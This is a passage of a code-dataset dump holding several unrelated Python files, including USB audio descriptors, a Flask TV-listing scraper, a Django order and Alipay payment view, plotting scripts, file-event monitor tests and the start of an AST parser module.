DescriptorFormat(\n \"bLength\" / construct.Const(9, construct.Int8ul),\n \"bDescriptorType\" / DescriptorNumber(AudioClassSpecificDescriptorTypes.CS_INTERFACE),\n \"bDescriptorSubtype\" / DescriptorNumber(AudioClassSpecificACInterfaceDescriptorSubtypes.HEADER),\n \"bcdADC\" / DescriptorField(description=\"Audio Device Class specification release version\", default=2.0),\n \"bCategory\" / DescriptorField(description=\"primary use of this audio function (see AudioFunctionCategoryCodes)\", default=AudioFunctionCategoryCodes.IO_BOX),\n \"wTotalLength\" / DescriptorField(description=\"total number of bytes for the class specific audio control interface descriptor; Includes the combined length of this descriptor header and all Clock Source, Unit and Terminal descriptors\"),\n \"bmControls\" / DescriptorField(description=\"D1..0: latency control\", default=0),\n)\n\nClockSourceDescriptor = DescriptorFormat(\n \"bLength\" / construct.Const(9, construct.Int8ul),\n \"bDescriptorType\" / DescriptorNumber(AudioClassSpecificDescriptorTypes.CS_INTERFACE),\n \"bDescriptorSubtype\" / DescriptorNumber(AudioClassSpecificACInterfaceDescriptorSubtypes.CLOCK_SOURCE),\n \"bClockID\" / DescriptorField(description=\"ID of the clock source entity within the audio function (used in requests)\"),\n \"bmAttributes\" / DescriptorField(description=\"D1..0: clock type (see ClockAttributs)\"),\n \"bmControls\" / DescriptorField(description=\"D1..0: clock frequency control (D0..1: See ClockFrequencyControl, D3..2: clock validity control (0))\", default=ClockFrequencyControl.NOT_PRESENT),\n \"bAssocTerminal\" / DescriptorField(description=\"ID of the terminal which is associated with this clock\", default=0),\n \"iClockSource\" / DescriptorField(description=\"index of the string description of this clock source\", default=0),\n)\n\nInputTerminalDescriptor = DescriptorFormat(\n \"bLength\" / construct.Const(17, construct.Int8ul),\n \"bDescriptorType\" / DescriptorNumber(AudioClassSpecificDescriptorTypes.CS_INTERFACE),\n \"bDescriptorSubtype\" / DescriptorNumber(AudioClassSpecificACInterfaceDescriptorSubtypes.INPUT_TERMINAL),\n \"bTerminalID\" / DescriptorField(description=\"unique identifier for the terminal within the audio function (used in requests)\"),\n \"wTerminalType\" / DescriptorField(description=\"a value of one of the terminal types Enums (eg InputTerminaTypes, ExternalTerminalTypes)\"),\n \"bAssocTerminal\" / DescriptorField(description=\"ID of the associated output terminal\", default=0),\n \"bCSourceID\" / DescriptorField(description=\"ID of the clock which is connected to this terminal\"),\n \"bNrChannels\" / DescriptorField(description=\"number of logical output channels in the terminal’s output channel cluster\"),\n \"bmChannelConfig\" / DescriptorField(description=\"describes the spatial location of the logical channels\", default=0),\n \"bmControls\" / DescriptorField(description=\"OR combination of ClockFrequencyControl, CopyProtectControl, ConnectorControl, ClusterControl, UnderflowControl and OverflowControl\", default=0),\n \"iChannelNames\" / DescriptorField(description=\"string descriptor index of the first logical channel name\", default=0),\n \"iTerminal\" / DescriptorField(description=\"ID of the input terminal string description\", default=0)\n)\n\nOutputTerminalDescriptor = DescriptorFormat(\n \"bLength\" / construct.Const(12, construct.Int8ul),\n \"bDescriptorType\" / DescriptorNumber(AudioClassSpecificDescriptorTypes.CS_INTERFACE),\n \"bDescriptorSubtype\" / DescriptorNumber(AudioClassSpecificACInterfaceDescriptorSubtypes.OUTPUT_TERMINAL),\n \"bTerminalID\" / DescriptorField(description=\"unique identifier for the terminal within the audio function.\"),\n \"wTerminalType\" / DescriptorField(description=\"a value of one of the terminal types Enums (eg OutputTerminaTypes, ExternalTerminalTypes)\"),\n \"bAssocTerminal\" / DescriptorField(description=\"ID of the associated input terminal\", default=0),\n \"bSourceID\" / DescriptorField(description=\"ID of the unit or terminal which is connected to this terminal\"),\n \"bCSourceID\" / DescriptorField(description=\"ID of the clock which is connected to this terminal\"),\n \"bmControls\" / DescriptorField(description=\"OR combination of ClockFrequencyControl, CopyProtectControl, ConnectorControl, UnderflowControl>>2 and OverflowControl>>2\", default=0),\n \"iTerminal\" / DescriptorField(description=\"ID of the input terminal string description\", default=0)\n)\n\nAudioStreamingInterfaceDescriptor = DescriptorFormat(\n \"bLength\" / construct.Const(9, construct.Int8ul),\n \"bDescriptorType\" / DescriptorNumber(DescriptorTypes.INTERFACE),\n \"bInterfaceNumber\" / DescriptorField(description=\"ID of the streaming interface\"),\n \"bAlternateSetting\" / DescriptorField(description=\"alternate setting number for the interface\", default=0),\n \"bNumEndpoints\" / DescriptorField(description=\"Number of data endpoints used (excluding endpoint 0). Can be: 0 (no data endpoint); 1 (data endpoint); 2 (data + explicit feedback endpoint)\", default=0),\n \"bInterfaceClass\" / DescriptorNumber(AudioInterfaceClassCode.AUDIO),\n \"bInterfaceSubClass\" / DescriptorNumber(AudioInterfaceSubclassCodes.AUDIO_STREAMING),\n \"bInterfaceProtocol\" / DescriptorNumber(AudioInterfaceProtocolCodes.IP_VERSION_02_00),\n \"iInterface\" / DescriptorField(description=\"index of a string descriptor describing this interface (0 = unused)\", default=0)\n)\n\nClassSpecificAudioStreamingInterfaceDescriptor = DescriptorFormat(\n \"bLength\" / construct.Const(16, construct.Int8ul),\n \"bDescriptorType\" / DescriptorNumber(AudioClassSpecificDescriptorTypes.CS_INTERFACE),\n \"bDescriptorSubtype\" / DescriptorNumber(AudioClassSpecificASInterfaceDescriptorSubtypes.AS_GENERAL),\n \"bTerminalLink\" / DescriptorField(description=\"the ID of the terminal to which this interface is connected\"),\n \"bmControls\" / DescriptorField(description=\"D1..0: active alternate setting control; D3..2: valid alternate settings control; D7..4: reserved, must be 0\", default=0),\n \"bFormatType\" / DescriptorField(description=\"see FormatTypes\"),\n \"bmFormats\" / DescriptorField(description=\"audio data formats which can be used with this interface\", length=4),\n \"bNrChannels\" / DescriptorField(description=\"Number of physical channels in the AS Interface audio channel cluster\"),\n \"bmChannelConfig\" / DescriptorField(description=\"spatial location of the physical channels\", default=0),\n \"iChannelNames\" / DescriptorField(description=\"ndex of a string descriptor, describing the name of the first physical channel.\", default=0)\n)\n\nTypeIFormatTypeDescriptor = DescriptorFormat(\n \"bLength\" / construct.Const(6, construct.Int8ul),\n \"bDescriptorType\" / DescriptorNumber(AudioClassSpecificDescriptorTypes.CS_INTERFACE),\n \"bDescriptorSubtype\" / DescriptorNumber(AudioClassSpecificASInterfaceDescriptorSubtypes.FORMAT_TYPE),\n \"bFormatType\" / DescriptorNumber(FormatTypes.FORMAT_TYPE_I),\n \"bSubslotSize\" / DescriptorField(description=\"number of bytes occupied by one audio subslot (1, 2, 3 or 4)\"),\n \"bBitResolution\" / DescriptorField(description=\"number of effectively used bits out of the available bits in an audio subslot\")\n)\n\nExtendedTypeIFormatTypeDescriptor = DescriptorFormat(\n \"bLength\" / construct.Const(9, construct.Int8ul),\n \"bDescriptorType\" / DescriptorNumber(AudioClassSpecificDescriptorTypes.CS_INTERFACE),\n \"bDescriptorSubtype\" / DescriptorNumber(AudioClassSpecificASInterfaceDescriptorSubtypes.FORMAT_TYPE),\n \"bFormatType\" / DescriptorNumber(FormatTypes.EXT_FORMAT_TYPE_I),\n \"bSubslotSize\" / DescriptorField(description=\"number of bytes occupied by one audio subslot (1, 2, 3 or 4)\"),\n \"bBitResolution\" / DescriptorField(description=\"number of effectively used bits out of the available bits in an audio subslot\"),\n \"bHeaderLength\" / DescriptorField(description=\"size of the packet header in bytes\"),\n \"bControlSize\" / DescriptorField(description=\"size of the control channel words in bytes\"),\n \"bSideBandProtocol\" / DescriptorField(description=\"side band protocol, see SidebandProtocols\", default=SidebandProtocols.PROTOCOL_UNDEFINED)\n)\n\nTypeIIFormatTypeDescriptor = DescriptorFormat(\n \"bLength\" / construct.Const(8, construct.Int8ul),\n \"bDescriptorType\" / DescriptorNumber(AudioClassSpecificDescriptorTypes.CS_INTERFACE),\n \"bDescriptorSubtype\" / DescriptorNumber(AudioClassSpecificASInterfaceDescriptorSubtypes.FORMAT_TYPE),\n \"bFormatType\" / DescriptorNumber(FormatTypes.FORMAT_TYPE_II),\n \"wMaxBitRate\" / DescriptorField(description=\"maximum bitrate of this interface in kbits/s\"),\n \"wSlotsPerFrame\" / DescriptorField(description=\"number of PCM audio slots in one audio frame\")\n)\n\nExtendedTypeIIFormatTypeDescriptor = DescriptorFormat(\n \"bLength\" / construct.Const(10, construct.Int8ul),\n \"bDescriptorType\" / DescriptorNumber(AudioClassSpecificDescriptorTypes.CS_INTERFACE),\n \"bDescriptorSubtype\" / DescriptorNumber(AudioClassSpecificASInterfaceDescriptorSubtypes.FORMAT_TYPE),\n \"bFormatType\" / DescriptorNumber(FormatTypes.EXT_FORMAT_TYPE_II),\n \"wMaxBitRate\" / DescriptorField(description=\"maximum bitrate of this interface in kbits/s\"),\n \"wSamplesPerFrame\" / DescriptorField(description=\"number of PCM audio samples in one audio frame\"),\n \"bHeaderLength\" / DescriptorField(description=\"size of the packet header in bytes\"),\n \"bSideBandProtocol\" / DescriptorField(description=\"side band protocol, see SidebandProtocols\", default=SidebandProtocols.PROTOCOL_UNDEFINED)\n)\n\nTypeIIIFormatTypeDescriptor = DescriptorFormat(\n \"bLength\" / construct.Const(9, construct.Int8ul),\n \"bDescriptorType\" / DescriptorNumber(AudioClassSpecificDescriptorTypes.CS_INTERFACE),\n \"bDescriptorSubtype\" / DescriptorNumber(AudioClassSpecificASInterfaceDescriptorSubtypes.FORMAT_TYPE),\n \"bFormatType\" / DescriptorNumber(FormatTypes.FORMAT_TYPE_III),\n \"bSubslotSize\" / DescriptorField(description=\"number of bytes occupied by one audio subslot (must be 2)\", default=2),\n \"bBitResolution\" / DescriptorField(description=\"number of effectively used bits out of the available bits in an audio subslot\"),\n)\n\nExtendedTypeIIIFormatTypeDescriptor = DescriptorFormat(\n \"bLength\" / construct.Const(8, construct.Int8ul),\n \"bDescriptorType\" / DescriptorNumber(AudioClassSpecificDescriptorTypes.CS_INTERFACE),\n \"bDescriptorSubtype\" / DescriptorNumber(AudioClassSpecificASInterfaceDescriptorSubtypes.FORMAT_TYPE),\n \"bFormatType\" / DescriptorNumber(FormatTypes.EXT_FORMAT_TYPE_III),\n \"bSubslotSize\" / DescriptorField(description=\"number of bytes occupied by one audio subslot (must be 2)\", default=2),\n \"bBitResolution\" / DescriptorField(description=\"number of effectively used bits out of the available bits in an audio subslot\"),\n \"bHeaderLength\" / DescriptorField(description=\"size of the packet header in bytes\"),\n \"bSideBandProtocol\" / DescriptorField(description=\"side band protocol, see SidebandProtocols\", default=SidebandProtocols.PROTOCOL_UNDEFINED)\n)\n\nClassSpecificAudioStreamingIsochronousAudioDataEndpointDescriptor = DescriptorFormat(\n \"bLength\" / construct.Const(8, construct.Int8ul),\n \"bDescriptorType\" / DescriptorNumber(AudioClassSpecificDescriptorTypes.CS_ENDPOINT),\n \"bDescriptorSubtype\" / DescriptorNumber(AudioClassSpecificEndpointDescriptorSubtypes.EP_GENERAL),\n \"bmAttributes\" / DescriptorField(description=\"bit D7 = 1: only packets with size wMaxPacketSize allowed\", default=0),\n \"bmControls\" / DescriptorField(description=\"D1..0: pitch control D3..2: data overrun control; D5..4: data underrun control;\", default=0),\n \"bLockDelayUnits\" / DescriptorField(description=\"wLockDelay unit: 0: undefined; 1: milliseconds; 2: decoded PCM samples;\", default=0),\n \"wLockDelay\" / DescriptorField(description=\"the time it takes this endpoint to reliably lock its internal clock recovery circuitry. Units see bLockDelayUnits\", default=0)\n)\n\n###################### MIDI #########################\n\nclass MidiStreamingGroupTerminalBlockDescriptorSubtypes(IntEnum):\n GR_TRM_BLOCK_UNDEFINED = 0x00\n GR_TRM_BLOCK_HEADER = 0x01\n GR_TRM_BLOCK = 0x02\n\nclass GroupTerminalBlockType(IntEnum):\n BIDIRECTIONAL = 0x00\n INPUT_ONLY = 0x01\n OUTPUT_ONLY = 0x02\n\nclass GroupTerminalDefaultMidiProtocol(IntEnum):\n USE_MIDI_CI = 0x00\n MIDI_1_0_UP_TO_64_BITS = 0x01\n MIDI_1_0_UP_TO_64_BITS_AND_JRTS = 0x02\n MIDI_1_0_UP_TO_128_BITS = 0x03\n MIDI_1_0_UP_TO_128_BITS_AND_JRTS = 0x04\n MIDI_2_0 = 0x11\n MIDI_2_0_AND_JRTS = 0x12\n\nclass GroupTerminalNumber(IntEnum):\n GROUP_1 = 0x00\n GROUP_2 = 0x01\n GROUP_3 = 0x02\n GROUP_4 = 0x03\n GROUP_5 = 0x04\n GROUP_6 = 0x05\n GROUP_7 = 0x06\n GROUP_8 = 0x07\n GROUP_9 = 0x08\n GROUP_10 = 0x09\n GROUP_11 = 0x0A\n GROUP_12 = 0x0B\n GROUP_13 = 0x0C\n GROUP_14 = 0x0D\n GROUP_15 = 0x0E\n GROUP_16 = 0x0F","sub_path":"usb_protocol/types/descriptors/uac2.py","file_name":"uac2.py","file_ext":"py","file_size_in_byte":19890,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"178266729","text":"\"\"\"\nAny config specific to model training step goes here.\n\"\"\"\n\n\n# General configuration\nMONITOR = 'val_loss'\nVAL_SPLIT = 0.2\nLSTM_UNITS = 100\nOPTIMIZER = 'adam'\nEPOCHS = 100\n\n# +\n# Binary classification\n# OUTPUT_SIZE = 1\n# ACTIVATION = 'sigmoid'\n# LOSS_FUNCTION = 'binary_crossentropy'\n# -\n\n# Multi-class classification\nOUTPUT_SIZE = 3\nACTIVATION = 'softmax'\nLOSS_FUNCTION = 'sparse_categorical_crossentropy'\n","sub_path":"model_training/model_training_config.py","file_name":"model_training_config.py","file_ext":"py","file_size_in_byte":409,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"219378547","text":"# coding=utf-8\n'''\nCreated on 31/03/2015\n\n@author: Douglas\n'''\nfrom util import special_character_html\nfrom settings import site, tv_Programs\nfrom flask import Flask, jsonify\n#from BeautifulSoup import BeautifulSoup,Tag\nfrom bs4 import BeautifulSoup\nimport urllib2\n\napp = Flask(__name__)\n\n@app.route('/get-tv-program/<channel>/<date>')\ndef api_get_tv_programs(channel,date):\n dictonary = {\"programs\":[]}\n url = tv_Programs+date.replace('-','/')+\"&canal=\"+channel\n page = urllib2.urlopen(url)\n content = BeautifulSoup(page.read())\n lines = content.findAll('tr')[2:]\n for line in lines:\n data = line.findAll('td')\n time = unicode(data[0].contents[0])\n if data[1].findAll('strong'):\n program_name = unicode(data[1].findAll('strong')[0].contents[0])\n link = data[1].findAll('a')[0].get('href')[12:]\n data = {\"time\":time,\"name\":program_name,\"link\":link}\n dictonary[\"programs\"].append(data)\n #dictonary[time] = [program_name,link]\n response = jsonify(dictonary)\n response.status_code = 200\n return response\n\n@app.route('/get-program/<program>')\ndef api_get_programs(program):\n dictonary = {}\n \n url = site + program\n page = urllib2.urlopen(url)\n content = BeautifulSoup(page.read())\n \n name = special_character_html(content.findAll(\"h1\", attrs={\"class\": \"programa\"})[0].contents[0])\n dictonary['Name'] = name\n dictonary[\"Description\"] = special_character_html(content.findAll(\"div\", attrs={\"class\": \"conteudo central\"})[0].findAll(\"p\")[0].contents[0])\n \n information = content.findAll(\"ul\", attrs={\"class\": \"detalhes\"})[0].findAll(\"li\")\n dictonary['Program_type'] = information[0].contents[0].contents[0]\n\n for details in information[1:]:\n key = details.contents[0].contents[0].replace(\":\",\"\")\n value = details.contents[1]\n dictonary[key]=value\n \n response = jsonify(dictonary)\n response.status_code = 200\n return response\n\n\n","sub_path":"api_services.py","file_name":"api_services.py","file_ext":"py","file_size_in_byte":2003,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"636736279","text":"from django.http import JsonResponse\nfrom django.shortcuts import render, redirect\n\n# Create your views here.\nfrom django.urls import reverse\n\nfrom CartApp.models import AxfCart\nfrom CartApp.views import get_total_price\nfrom OrderApp.models import AxfOrder, AxfOrderGoods\nfrom alipay import AliPay\nfrom AXF.settings import APP_PRIVATE_KEY_STRING, ALIPAY_PUBLIC_KEY_STRING\n\n\ndef make_order(request):\n userid=request.session.get('userid')\n data={\n 'msg':'ok',\n 'status':200,\n }\n if userid:\n order = AxfOrder()\n order.o_user_id = userid\n carts=AxfCart.objects.filter(c_user_id=userid).filter(c_is_select=True)\n order.save()\n order.axfordergoods_set.first()\n for cart in carts:\n og=AxfOrderGoods()\n og.og_order_id=order.id\n og.og_goods_id=cart.c_goods_id\n og.og_goods_num=cart.c_goods_num\n og.og_total_price=get_total_price(userid)\n print(og.og_total_price)\n og.save()\n for cart in carts:\n cart.delete()\n data['orderid']=order.id\n return JsonResponse(data=data)\n\n else:\n return redirect(reverse('axfuser:login'))\n\n\ndef order_detail(request):\n orderid=request.GET.get('orderid')\n\n if orderid:\n order=AxfOrder.objects.get(pk=orderid)\n total_price = order.axfordergoods_set.first().og_total_price\n print(total_price)\n context={\n 'order':order,\n 'total_price': total_price\n }\n return render(request,'axf/order/order_detail.html',context=context)\n\n\ndef paytest(request):\n alipay = AliPay(\n appid=\"2016101200665438\",\n app_notify_url=None, # 默认回调url\n app_private_key_string=APP_PRIVATE_KEY_STRING,\n # 支付宝的公钥,验证支付宝回传消息使用,不是你自己的公钥,\n alipay_public_key_string=ALIPAY_PUBLIC_KEY_STRING,\n sign_type=\"RSA2\",# RSA 或者 RSA2\n debug=False) # 默认False\n\n # 电脑网站支付,需要跳转到https://openapi.alipay.com/gateway.do? + order_string\n order_string = alipay.api_alipay_trade_page_pay(\n out_trade_no=\"1989\",\n total_amount=100,\n subject=\"hello\",\n return_url=\"https://www.1000phone.com\",\n notify_url=\"https://www.1000phone.com\",\n )\n print(order_string)\n return redirect('https://openapi.alipaydev.com/gateway.do?'+order_string)\n\n\n","sub_path":"Demo/AXF/OrderApp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2443,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"642889201","text":"import cauldron as cd\nimport plotly.graph_objs as go\nfrom cauldron import plotting\nfrom tracksim.coupling import swing\nfrom tracksim.coupling.plotting import scatter\n\ncd.refresh(swing)\n\ndf = cd.shared.df\nswing_data = swing.compute_many(cd.shared.trials)\nfitness = swing.to_fitness(swing_data)\ndf['swing'] = [fitness[tid] for tid in df.id]\n\ncd.display.plotly(\n data=scatter.create(\n df,\n [swing_data[tid].value for tid in df.id],\n [swing_data[tid].uncertainty for tid in df.id],\n x_column='order'\n ),\n layout=plotting.create_layout(\n title='Normalized Swing by Trial',\n x_label='Trial Index (#)',\n y_label='Swing'\n )\n)\n\ncd.display.plotly(\n data=go.Bar(\n y=df.swing,\n text=df.short_id,\n marker=dict(\n color=df.color\n )\n ),\n layout=plotting.create_layout(\n title='Swing Deviation',\n x_label='Trial Index (#)',\n y_label='Fractional Deviation'\n )\n)\n\n","sub_path":"BEB_500_S3_Coupling_Length/S05-swing.py","file_name":"S05-swing.py","file_ext":"py","file_size_in_byte":978,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"176912897","text":"'''\r\nPython program to print even length words in a string\r\n'''\r\nsentence = \"This is my name vinit and I am a good boy\"\r\nl1 = sentence.split()\r\nl2 =[]\r\nprint(sentence.split())\r\nfor x in l1:\r\n if len(x)%2 == 0:\r\n l2.append(x)\r\n\r\nprint(\"List of the words having Even number\",l2)\r\n","sub_path":"str_5.py","file_name":"str_5.py","file_ext":"py","file_size_in_byte":288,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"502898360","text":"\"\"\"\n@author: Qinjuan Yang\n@time: 2020-10-28 21:03\n@desc: \n\"\"\"\nimport argparse\nimport os\nimport pandas as pd\nimport pickle as pkl\n\nimport torch\n\nfrom logger import get_logger\nfrom model_utils import load_model_config\n\nlogger = get_logger()\n\n\ndef parse_arguments():\n parser = argparse.ArgumentParser(description=\"News Classification\")\n\n # dataset\n parser.add_argument(\n \"--test_path\",\n type=str,\n help=\"path to the test dataset file\"\n )\n\n # embedding\n parser.add_argument(\n \"--embedding_path\",\n type=str,\n default=\"\",\n help=\"pre-trained embedding file\"\n )\n\n # model\n parser.add_argument(\n \"--model\",\n type=str,\n default=\"FastText\",\n help=\"choose a model: TextCNN, TextRNN, FastText. default is TextCNN.\"\n )\n\n parser.add_argument(\n \"--model_dir\",\n type=str,\n help=\"Directory to save model\"\n )\n\n parser.add_argument(\n \"--config_dir\",\n type=str,\n help=\"Directory for configuration file.\"\n )\n\n parser.add_argument(\n \"--log_dir\",\n type=str,\n help=\"Directory for log files.\"\n )\n\n args = parser.parse_args()\n logger.info(\"Arguments: {}\".format(args))\n return args\n\n\nif __name__ == '__main__':\n args = parse_arguments()\n\n config = load_model_config(args.config_dir, args.model)\n\n device = torch.device(\"cuda\") if torch.cuda.is_available() else torch.device(\"cpu\")\n\n logger.info(\"Loading data...\")\n test_df = pd.read_csv(args.test_path)\n logger.info(\"Finish loading data with size {}\".format(test_df.shape[0]))\n\n model_path = os.path.join(args.model_dir, \"model_{}.model\".format(args.model))\n\n if args.model == \"FastText\":\n import fasttext\n from model_utils_fasttext import test_model\n\n logger.info(\"Loading model from {}\".format(model_path))\n model = fasttext.load_model(model_path)\n\n logger.info(\"Testing model...\")\n y_pred = test_model(model, X_test=test_df[\"text\"].tolist())\n else:\n from data_utils import build_dataset, build_iterator\n from model_utils import test_model\n\n test_df[\"text_words\"] = test_df[\"text\"].apply(lambda x: x.split())\n vocab2id = pkl.load(open(os.path.join(args.model_dir, \"vocab_{}.vocab\".format(args.model)), \"rb\"))\n data = build_dataset(test_df[\"text_words\"], vocab2id, max_doc_len=config.max_doc_len)\n data_iter = build_iterator(data, config.batch_size, device)\n\n logger.info(\"Loading model from {}\".format(model_path))\n model = torch.load(model_path)\n\n logger.info(\"Testing model...\")\n y_pred = test_model(model, data_iter)\n\n test_df[\"label\"] = y_pred\n test_df[\"label\"].to_csv(\"predict_{}.csv\".format(args.model), index=False, header=\"label\")\n logger.info(\"Finishing predict label for testing data.\")\n\n","sub_path":"src/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":2868,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"560741197","text":"# !/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\n@author: Sam Schott (ss2151@cam.ac.uk)\n\n(c) Sam Schott; This work is licensed under a Creative Commons\nAttribution-NonCommercial-NoDerivs 2.0 UK: England & Wales License.\n\n\"\"\"\nfrom maestral.sync.monitor import *\n\n\ndef path(i):\n return f'test_{i}.txt'\n\n# Simple cases\nfile_events_test0 = [\n # created + deleted -> None\n FileCreatedEvent(path(1)),\n FileDeletedEvent(path(1)),\n # deleted + created -> modified\n FileDeletedEvent(path(2)),\n FileCreatedEvent(path(2)),\n]\n\nres0 = [\n # created + deleted -> None\n # deleted + created -> modified\n FileModifiedEvent(path(2))\n]\n\n# Single file events, keep as is\nfile_events_test1 = [\n FileModifiedEvent(path(1)),\n FileCreatedEvent(path(2)),\n FileDeletedEvent(path(3)),\n FileMovedEvent(path(4), path(5)),\n]\n\nres1 = [\n FileModifiedEvent(path(1)),\n FileCreatedEvent(path(2)),\n FileDeletedEvent(path(3)),\n FileMovedEvent(path(4), path(5)),\n]\n\n# Difficult move cases\nfile_events_test2 = [\n # created + moved -> created\n FileCreatedEvent(path(1)),\n FileMovedEvent(path(1), path(2)),\n # moved + deleted -> deleted\n FileMovedEvent(path(1), path(4)),\n FileDeletedEvent(path(4)),\n # moved + moved back -> modified\n FileMovedEvent(path(5), path(6)),\n FileMovedEvent(path(6), path(5)),\n # moved + moved -> deleted + created (this is currently not handled as a single moved)\n FileMovedEvent(path(7), path(8)),\n FileMovedEvent(path(8), path(9)),\n]\n\nres2 = [\n # created + moved -> created\n FileCreatedEvent(path(2)),\n # moved + deleted -> deleted\n FileDeletedEvent(path(1)),\n # moved + moved back -> modified\n FileModifiedEvent(path(5)),\n # moved + moved -> deleted + created (this is currently not handled as a single moved)\n FileDeletedEvent(path(7)),\n FileCreatedEvent(path(9)),\n]\n\n# Gedit save event\nfile_events_test3 = [\n FileCreatedEvent('.gedit-save-UR4EC0'), # save new version to tmp file\n FileModifiedEvent('.gedit-save-UR4EC0'), # modify tmp file\n FileMovedEvent(path(1), path(1) + '~'), # move old version to backup\n FileMovedEvent('.gedit-save-UR4EC0', path(1)), # replace old version with tmp file\n]\n\nres3 = [\n FileModifiedEvent(path(1)), # modified file\n FileCreatedEvent(path(1) + '~'), # backup\n]\n\n# macOS safe-save event\nfile_events_test4 = [\n FileMovedEvent(path(1), path(1) + '.sb-b78ef837-dLht38'), # move old version to backup\n FileCreatedEvent(path(1)), # create new version\n FileDeletedEvent(path(1) + '.sb-b78ef837-dLht38'), # delete backup\n]\n\nres4 = [\n FileModifiedEvent(path(1)), # modified file\n]\n\n# Word on macOS created event\nfile_events_test5 = [\n FileCreatedEvent(path(1)),\n FileDeletedEvent(path(1)),\n FileCreatedEvent(path(1)),\n FileCreatedEvent('~$' + path(1)),\n]\n\nres5 = [\n FileCreatedEvent(path(1)), # created file\n FileCreatedEvent('~$' + path(1)), # backup (will be deleted when file is closed)\n]\n\n\ndef test_clean_local_events():\n\n cleaned_file_events_test0 = UpDownSync._clean_local_events(file_events_test0)\n cleaned_file_events_test1 = UpDownSync._clean_local_events(file_events_test1)\n cleaned_file_events_test2 = UpDownSync._clean_local_events(file_events_test2)\n cleaned_file_events_test3 = UpDownSync._clean_local_events(file_events_test3)\n cleaned_file_events_test4 = UpDownSync._clean_local_events(file_events_test4)\n cleaned_file_events_test5 = UpDownSync._clean_local_events(file_events_test5)\n\n assert set(cleaned_file_events_test0) == set(res0)\n assert set(cleaned_file_events_test1) == set(res1)\n assert set(cleaned_file_events_test2) == set(res2)\n assert set(cleaned_file_events_test3) == set(res3)\n assert set(cleaned_file_events_test4) == set(res4)\n assert set(cleaned_file_events_test5) == set(res5)\n","sub_path":"tests/sync/test_monitor.py","file_name":"test_monitor.py","file_ext":"py","file_size_in_byte":3914,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"644599765","text":"''' Desenvolva um programa que leia o nome, idade e sexo de 4 pessoas. No final do programa, mostre:\n- A média de idade no grupo.\n- qual o nome do homem mais velho.\n- quantas mulheres tem menos de 20 anos. '''\n\nnome_homem = ''\nhomem_mais_velho = 0\nmulheres_menores = 0\nmedia_idade = 0\nfor pessoas in range(1, 5):\n print(f'========== {pessoas} PESSOA ==========')\n nome = str(input('Digite o nome: '))\n idade = int(input('Digite a idade: '))\n sexo = int(input('[ 1 ] MASCULINO '\n '[ 2 ] FEMININO'\n '\\nDigite o sexo: '))\n media_idade += idade\n\n if sexo == 1:\n if pessoas == 1:\n homem_mais_velho = idade\n nome_homem = nome\n else:\n if idade > homem_mais_velho:\n homem_mais_velho = idade\n nome_homem = nome\n if sexo == 2:\n if idade < 20:\n mulheres_menores += 1\n\nprint(f'A média de idade do grupo é {media_idade / 4}. ')\nprint(f'O homem mais velho tem {homem_mais_velho} anos, e seu nome é: {nome_homem}.')\nprint(f'Nesse grupo tem(os) {mulheres_menores} mulheres com menos de 20 anos. ')\n","sub_path":"PythonMundoDois/ex056.py","file_name":"ex056.py","file_ext":"py","file_size_in_byte":1142,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"211455334","text":"##############################################################################\n# Copyright 2016 Jesse Maarleveld #\n# #\n# Licensed under the Apache License, Version 2.0 (the \"License\"); #\n# you may not use this file except in compliance with the License. #\n# You may obtain a copy of the License at #\n# #\n# http://www.apache.org/licenses/LICENSE-2.0 #\n# #\n# Unless required by applicable law or agreed to in writing, software #\n# distributed under the License is distributed on an \"AS IS\" BASIS, #\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. #\n# See the License for the specific language governing permissions and #\n# limitations under the License. #\n##############################################################################\n\n\"\"\"\nThis module takes care of building a AST tree from a source file or string.\n\"\"\"\n\n##############################################################################\n##############################################################################\n# Imports\n##############################################################################\n\nimport collections.abc\nimport typing\n\nfrom ..tools.public import public\nfrom .collectors import PreprocessorMeta, Preprocessor\nfrom .collectors import StatementMeta, Statement\nfrom .expr import compile_expr\n\n##############################################################################\n##############################################################################\n# Base class for all AST objects\n##############################################################################\n\n# ISSUE 001: Move ASTNode class to separate file to avoid circular import\n\nfrom .ast_base import ASTNode\n\n##############################################################################\n##############################################################################\n# Public interface to parsing source\n##############################################################################\n\n\n@public\ndef parse_file(path: str) -> ASTNode:\n \"\"\"Create an AST tree from a source file.\n :param path: Path to source file.\n :return: Created AST tree.\n \"\"\"\n with open(path) as file:\n source = _apply_preprocessors(_line_iterator(file))\n ast = _CompilingScope(source)\n return ast\n\n\n@public\ndef parse_string(source: str) -> ASTNode:\n \"\"\"Create am AST tree from a string containing\n source code.\n :param source: String containing source.\n :return: Created AST tree.\n \"\"\"\n source = _apply_preprocessors(_line_iterator(source.splitlines()))\n ast = _CompilingScope(source)\n return ast\n\n\n##############################################################################\n##############################################################################\n# Compiling support functions\n##############################################################################\n\n\ndef _line_iterator(lines: typing.Iterator[str]) -> typing.Iterator[str]:\n \"\"\"Yield lines of source from 'lines', but strip\n extra whitespace.\n :param lines: lines\n :return: lines\n \"\"\"\n for line in lines:\n yield line.strip()\n\n\ndef _apply_preprocessors(source: typing.Iterator[str]) -> typing.Iterator[str]:\n \"\"\"Apply all defined preprocessors to the given source code.\n\n :param source: Source to be processed.\n :return: Processed source.\n \"\"\"\n for preprocessor in PreprocessorMeta.preprocessors:\n result = preprocessor.apply(source)\n if result is NotImplemented:\n raise RuntimeError(\n 'Not working preprocessor: {}'.format(preprocessor))\n elif not result:\n continue\n source = result\n yield from source\n\n\n##############################################################################\n##############################################################################\n# Compiling support classes\n##############################################################################\n\n# Each scope, in the 